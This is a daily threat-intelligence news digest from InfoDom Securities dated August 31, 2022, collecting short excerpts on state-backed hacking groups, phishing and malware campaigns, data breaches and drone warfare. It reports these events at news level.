Wednesday, Aug 31, 2022 // (IG): BB //Sponsor: ShadowNews
US navy says Iran seized American sea drone in Persian Gulf, tried to tow it away
FROM THE MEDIA: Iran's paramilitary Revolutionary Guard seized an American sea drone in the Persian Gulf and tried to tow it away, only releasing the unmanned vessel when a US Navy warship and helicopter approached, officials said Tuesday. It was the first time Iran targeted the Navy's Mideast-based 5th Fleet's new drone task force. While the interception ended without incident, tensions remain high between Washington and Tehran as negotiations over the Islamic Republic's tattered nuclear deal with world powers hang in the balance.
READ THE STORY: News 9 Live
Charming Kitten (APT35) scrapes email account data
FROM THE MEDIA: Researchers at Google's Threat Analysis Group (TAG) have published a report on a new tool dubbed "HYPERSCRAPE" that's being used by the Iranian threat actor Charming Kitten (APT35) to steal data from Gmail, Yahoo, and Microsoft Outlook accounts. Since 2020, the tool has been "deployed against fewer than two dozen accounts located in Iran": "HYPERSCRAPE requires the victim’s account credentials to run using a valid, authenticated user session the attacker has hijacked, or credentials the attacker has already acquired. It spoofs the user agent to look like an outdated browser, which enables the basic HTML view in Gmail.
READ THE STORY: The CyberWire
MuddyWater exploits Log4Shell
FROM THE MEDIA: Microsoft warns that the Iranian APT MERCURY (also known as MuddyWater) is exploiting the Log4Shell in vulnerable SysAid Server instances belonging to Israeli organizations: "On July 23 and 25, 2022, MERCURY was observed using exploits against vulnerable SysAid Server instances as its initial access vector. Based on observations from past campaigns and vulnerabilities found in target environments, Microsoft assess that the exploits used were most likely related to Log4j 2.
READ THE STORY: The CyberWire
Russian hackers gain powerful ‘MagicWeb’ authentication bypass
FROM THE MEDIA: Nobelium, a highly active Russian threat actor, has a new technique for bypassing authentication, according to Microsoft. The notorious hacking group behind the 2020 SolarWinds supply chain attack has created a new technique that allows the threat actor to maintain a firm position on a corporate network even as IT teams and security attempts to shut down the attack. The technique has been dubbed MagicWeb by Microsoft. One notable difference about MagicWeb is that the group is not employing supply chain attacks to launch the capability. Instead, they are abusing stolen admin credentials.
READ THE STORY: OODALOOP
Chinese hackers - TA423/Red Ladon, target energy firms in South China Sea, Asia-Pacific
FROM THE MEDIA: Cyber-security researchers on Tuesday said they discovered a recent cyber espionage campaign targeting energy and manufacturing firms globally, including in the South China Sea, that was perpetrated by Chinese hackers. The targets of this cyber attack spanned Australia, Malaysia, and Europe, as well as entities that operate in the South China Sea, according to US-based cyber-security firm Proofpoint and PwC Threat Intelligence. "TA423/Red Ladon is a China-based, espionage-motivated threat actor that has been active since 2013, targeting a variety of organisations in response to political events in the Asia-Pacific region, with a focus on the South China Sea," the company said in a blog post.
READ THE STORY: Times Now News // ThreatPost // THN
Russian hackers blamed for ongoing Montenegro cyberattack
FROM THE MEDIA: Montenegro issued a warning over a massive ongoing cyberattack against government services and key public infrastructure including power plants and water supplies. Officials are putting the blame on Russian state-backed hackers, who have been targeting Ukraine’s allies since the invasion earlier this year. The Montenegrin Agency for National Security (ANB) said the country had been caught up in a “hybrid war”, with Russia using state-backed hackers to bring down infrastructure.
READ THE STORY: Techmonitor
Russian streaming platform confirms data breach affecting 7.5M users
FROM THE MEDIA: Russian media streaming platform ‘START’ (start.ru) has confirmed rumors of a data breach impacting millions of users. The platform’s administrators shared that network intruders managed to steal a 2021 database from its systems and are now distributing samples online. The stolen database contains email addresses, phone numbers, and usernames. START characterizes it as uninteresting to most cybercriminals as it can’t be used for taking over accounts.
READ THE STORY: Bleeping Computer
Ransomware group blurs lines between crime, state-sponsored activities, HHS alert warns
FROM THE MEDIA: The Department of Health and Human Services Cybersecurity Coordination Center warns “Evil Corp should be considered a significant threat to the U.S. health sector.” An HC3 alert details the ongoing risk posed by the highly capable cybercrime syndicate based out of Russia. “It’s entirely plausible Evil Corp could be tasked with acquiring intellectual property from the U.S. health sector” using data exfiltration cyberattacks “at the behest of the Russian government,” according to the alert.
READ THE STORY: SCMAG
DARPA Moves Forward With Project To Revolutionize Satellite Communication
FROM THE MEDIA: The U.S. Defense Advanced Research Projects Agency (DARPA), best known for creating the internet, advanced its plan to revolutionize communication among low orbiting satellite networks by selecting 11 teams to work on its Space-Based Adaptive Communications Node program.
Known as Space-BACN, the project seeks to create a low-cost, reconfigurable optical communications terminal that adapts to most optical intersatellite link standards, translating between diverse satellite constellations.
READ THE STORY: The First Newspaper
Renewable energy is maligned by misinformation. It’s a distraction, experts say
FROM THE MEDIA: ou can generally trust that when you flip a light switch in the U.S., the power will come on. But earlier this year, a forecast by the North American Electric Reliability Corporation (NERC) predicted much of the country could see blackouts during peak summer demand, when everyone is blasting their air-conditioners. While major outages haven’t happened so far, GOP elected officials and fossil fuel supporters still used the report to bash the shift to renewable power.
READ THE STORY: WOUB
US says Russia receives Iranian combat drones, many faulty
FROM THE MEDIA: Russia has begun receiving Iranian combat drones to be used in the Ukraine war, but many of them have already proven faulty, the US military said on Tuesday (Aug 30). "Russian transport aircraft loaded the UAV equipment at an airfield in Iran and subsequently flew from Iran to Russia over several days in August," said Pentagon spokesman Brigadier General Pat Ryder, using the initials for unmanned aerial vehicle. "It's likely part of Russia's plans to import hundreds of Iranian UAVs of various types," he said.
READ THE STORY: CNA
Why Ethiopia has moved from banning crypto to regulating it
FROM THE MEDIA: In June this year, Ethiopia’s central bank issued a statement saying that crypto business in the country is illegal. Less than three months later, the country seems to have reversed this decision, instead requiring cryptocurrency operators to register with the national cybersecurity agency—the Information Network Security Administration (INSA)—within 10 days.
READ THE STORY: QZ
Taiwan to Destroy Chinese Drones
FROM THE MEDIA: The video above has gone viral, depicting Taiwanese soldiers throwing rocks at drones believed to be sent by China. Reports are circulating that Taiwan also allowed store-bought civilian drones to enter its airspace, which leaves many to wonder how they can compete against China’s military surveillance. Backed by the US, Taiwan is beginning to push back against China and its One China policy. The Ministry of National Defense (MND) has reported that they will begin to shoot down Chinese drones or unmanned aerial vehicles (UAVs).
READ THE STORY: Armstrong Economics
Ransomware, nation-state attacks top Federal Reserve’s IT security concerns for banks
FROM THE MEDIA: The Federal Reserve Board, aka the Fed, published its annual “Cybersecurity and Financial System Resilience” report earlier this month. Not surprisingly, ransomware attacks, nation-state incursions and third-party access topped the list of potential IT security threats to the U.S. financial industry. With an eye to keeping the country’s financial industry as stable as possible, the Fed report looks at the potential influences that could rock the monetary boat.
READ THE STORY: SCMAG
Three campaigns delivering multiple malware, including ModernLoader and XMRig miner
FROM THE MEDIA: Cisco Talos researchers observed three separate, but related, campaigns between March and June 2022 that were delivering multiple malware, including the ModernLoader bot (aka Avatar bot), RedLine info-stealer and cryptocurrency miners to victims. ModernLoader is a .NET remote access trojan that supports multiple features, including the capability of gathering system information, executing arbitrary commands, or downloading and running a file from the C2 server.
READ THE STORY: Security Affairs
Okta entangled by Twilio phishing attack
FROM THE MEDIA: The phishing attack against Twilio continues to unravel, as more victims are discovered and come forward with details about various levels of exposure. The incident bears the markings of a persistent and sophisticated campaign that engulfed IT service providers, which can lead the threat actor to additional downstream targets. The threat actor exploited usernames and passwords stolen in previous phishing campaigns to trigger text-message authentication processes, and used its access to Twilio’s systems to search for one-time passwords sent as a result of those two-factor authentication requests, according to Okta.
READ THE STORY: CyberSecurityDive
IAM house Okta confirms 0ktapus/Scatter Swine attack
FROM THE MEDIA: Identity and access management specialist Okta has warned customers to be on their guard against a widespread and impactful phishing campaign that has already hit a very limited number of its customers. This comes after researchers at Group-IB gathered evidence that tied together multiple recent incidents, including an attack on Twilio, in a criminal campaign that seems to have heavily exploited the Okta brand, and the trust its customers hold in it, in order to compromise its targets.
READ THE STORY: ComputerWeekly
Hackers hide malware in James Webb telescope images
FROM THE MEDIA: Threat analysts have spotted a new malware campaign dubbed ‘GO#WEBBFUSCATOR’ that relies on phishing emails, malicious documents, and space images from the James Webb telescope to spread malware. The malware is written in Golang, a programming language that is gaining popularity among cybercriminals because it is cross-platform (Windows, Linux, Mac) and offers increased resistance to reverse engineering and analysis. In the recent campaign discovered by researchers at Securonix, the threat actor drops payloads that are currently not marked as malicious by antivirus engines on the VirusTotal scanning platform.
READ THE STORY: Bleeping Computer
Emerging Potential of Quantum Computing
FROM THE MEDIA: With rapid advancements in digital engineering and data architecture, we require powerful computational models. Traditional computational models, comprising of binary numbers 1s and 0s, do not have the computational power to sort exorbitant amounts of data as the world has moved toward complex digital technologies. Imagine if you must distribute test sheets among students. You may be able to distribute 100 sheets per minute. As the number of students grows, the time to distribute the sheets would shrink.
READ THE STORY: Modern Diplomacy
Security Researcher Finds That TikTok Browser Is Tracking Keystrokes
FROM THE MEDIA: A security researcher has raised alarms about the TikTok browser embedded in the popular app, presenting evidence that it is capable of tracking keystrokes. The company responded to the report by confirming that the ability exists within the app’s code, but that it is not active and that it is only used internally for debugging and testing purposes. Security researcher Felix Krause, a former Google engineer, notes that even having this ability present in an app is highly unusual and something that is usually only done by malware and spyware.
READ THE STORY: CPO
Microsoft Excel attacks fall out of fashion with hackers
FROM THE MEDIA: Cybercriminals are turning away from Microsoft Excel as a method for sneaking malware onto the PCs of potential victims. Security vendor Hornetsecurity said its researchers logged a significant drop over July in the volume of malware-laden emails that relied on malicious Excel documents. The company's monthly email threat report noted that from June to the end of July, Excel attacks plummeted by nearly 10 percentage points.
READ THE STORY: Techtarget
FBI warns about cyber criminals exploiting DeFi vulnerabilities
FROM THE MEDIA: FBI warns about cyber criminals exploiting DeFi vulnerabilities Vulnerabilities in decentralized finance (DeFi) platforms are being exploited by cybercriminals to steal cryptocurrency, the Federal Bureau of Investigation warned Monday. DeFi platforms generally rely on smart contracts, which are automated agreements that lack an intermediary, like a broker. However, that has left many platforms, and the assets investors entrust to them, at risk. “Cyber criminals seek to take advantage of investors’ increased interest in cryptocurrencies, as well as the complexity of cross-chain functionality and open source nature of DeFi platforms,” the agency warned in a public service announcement.
READ THE STORY: The Record
Computer attack on Sernac: Experts confirm ransomware has already been used in Canada and the Netherlands
FROM THE MEDIA: The computer attack that has hit the National Consumer Service (CERNAC) since last Thursday, and has sent warnings from the government’s special technical unit to all state agencies, worries the public. After the fact, experts point to similarities that cyberattacks have with others reported in recent months. In fact, according to Kronup Cyber Security’s director of operations, german fernandez The case will be about a new type of ransomware, of which only two are previous records, and which can be linked to the person or persons responsible for bringing down the entire consumer service platform of a pro-consumer organization.
READ THE STORY: Nation World News
How safe is your drinking water
FROM THE MEDIA: When it comes to cybersecurity of our essential infrastructure in the United States, things may not be as bad as you think. The truth is that they are far worse. On Aug. 15, a water department plant in the UK that provides water to 200,000 consumers was the victim of a ransomware cyberattack in which the hackers indicated that they also had obtained access to the computer software that controls the chemicals in the water. In its ransom demand, the hackers said “if you are shocked it is good” and in that they are correct.
READ THE STORY: The Hill
Breaches You Don’t Hear About
FROM THE MEDIA: I think it’s fair to say that, over the decades, if the general public had been alerted to all the attempted terrorist attacks tracked down and prevented by intelligence – as opposed to just the ones they know about – they might be a little edgy. It’s exactly the same with cybersecurity breaches. I tuned into a Cato Networks presentation along the lines of “three breaches you didn’t know about” via LinkedIn in my case, but here’s the generic link.
READ THE STORY: Computer Weekly
If America refuses to lead globalization, China will
FROM THE MEDIA: After World War II, the IMF was established to maintain fixed exchange rates to enable commerce and short-circuit a repeat of the competitive currency devaluations of the 1930s. Since the advent of market-determined exchange rates, it has proven useless to resolve the complaints about governments suppressing currency values to gain competitive advantages. China’s Belt and Road and European and American responses are weaponizing development finance, and the World Bank can do little about it.
READ THE STORY: Washington Times
NATO Investigates Dark Web Leak of Data Stolen From Missile Vendor
FROM THE MEDIA: NATO is allegedly investigating a data leak that impacted a European missile systems firm. Hackers have reportedly put the data stolen from the firm u for sale on the Dark Web, including blueprints of weapons currently utilized by Ukraine in the war with Russia. The company, MBDA Missile Systems, is headquartered in France and sells weapons to several different NATo countries. The company has clarified that the data for sale does belong to the firm. The attack appears to have been a ransomware attack, however, the data was acquired from a compromised external hard drive rather than internal networks.
READ THE STORY: OODALOOP
Organizations are spending billions on malware defense that’s easy to bypass
FROM THE MEDIA: Last year, organizations spent $2 billion on products that provide Endpoint Detection and Response, a relatively new type of security protection for detecting and blocking malware targeting network-connected devices. EDRs, as they're commonly called, represent a newer approach to malware detection. Static analysis, one of two more traditional methods, searches for suspicious signs in the DNA of a file itself. Dynamic analysis, the other more established method, runs untrusted code inside a secured "sandbox" to analyze what it does to confirm it's safe before allowing it to have full system access.
READ THE STORY: Arstechnica
Receipt for €8M iOS Zero-Day Sale Pops Up on Dark Web
FROM THE MEDIA: Security researchers have identified screenshots of a transaction between an unknown customer and Intellexa, a spyware company, in which the buyer paid €8 million to obtain access to a full-service zero-day remote control execution exploit. The transaction shows the zero-day exploit referred to as Nova Suite to the unknown buyer. The bill is dated July 14, and Nova Suite promises many capabilities and turnkey infections for both Android and iOS devices. The paperwork references an outdate iOS version 15.4.1 from March, however, it is not apparent how many devices are still vulnerable to the exploit.
READ THE STORY: OODALOOP
Items of interest
Drones Are Changing Battlefields
FROM THE MEDIA: Not a day goes by that Ukraine does not issue a military statement bragging about its surgical strikes against Russian military targets.
Six months after Russia’s invasion of Ukraine, one weapon that has proved critical and has given Ukrainian forces the edge on the battlefield by stopping long Russian tank columns in their place is the unmanned aerial vehicle (UAV).
UAVs, or drones are playing a key role in Ukraine’s counteroffensives against Russia’s assault, and their success is so astounding that Ukrainian forces are singing its praises, literally.
A Ukrainian song went viral in April when Turkish drones operated by Ukrainian forces inflicted major damage on Russian tanks.
The lyrics go like this: “Bayraktar will change your mind.”
The Bayraktar, the Turkish-made weapon that Ukrainian officials are touting, is one of the most effective in Ukraine’s arsenal that has played a part in slowing down the Russian advance.
The Bayraktar TB2 is small enough to be moved around on a flatbed truck, making it hard to detect and giving it the ability to be launched from almost anywhere.
READ THE STORY: The Media Line
YouTubers are getting HACKED (Video)
FROM THE MEDIA: Hackers are trying to take over YouTube channels. BUT they made a mistake in going after the best hacking youtuber, John Hammond. In this video, John Hammond breaks down the hacking attempt on his channel and how the hackers will try to steal your credentials and take over your YouTube channel.
Warning! Python Remote Keylogger (this is really too easy!) (Video)
FROM THE MEDIA: A Python program that saves keystrokes to a cloud server. I compiled the script to run on a Windows 11 computer with anti-virus enabled. May this be a warning to both you and your family. Don't download software that you don't trust. Only download software from reputable software developers and those you trust.
hese open source products are reviewed from analysts at InfoDom Securities and provide possible context about current media trends in regard to the realm of cyber security. The stories selected cover a broad array of cyber threats and are intended to aid readers in framing key publicly discussed threats and overall situational awareness. InfoDom Securities does not specifically endorse any third-party claims made in their original material or related links on their sites, and the opinions expressed by third parties are theirs alone. Contact InfoDom Securities at dominanceinformation@gmail.com